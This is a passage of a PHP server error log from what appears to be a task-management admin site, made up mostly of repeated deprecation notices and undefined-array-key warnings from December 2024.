/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:45:41 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 09:53:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:11:11 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [13-Dec-2024 10:26:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 10:34:16 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 11:29:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 11:30:39 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [13-Dec-2024 11:39:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:07:24 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:09:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 12:21:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:08:14 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:08:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:08:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:08:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:08:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:09:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:09:35 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:09:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:09:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:10:10 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:12:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [13-Dec-2024 15:12:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [13-Dec-2024 15:18:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [13-Dec-2024 15:25:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 03:24:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 17:18:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Dec-2024 17:18:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [16-Dec-2024 17:18:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [16-Dec-2024 18:20:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Dec-2024 00:56:13 Australia/Sydney] PHP 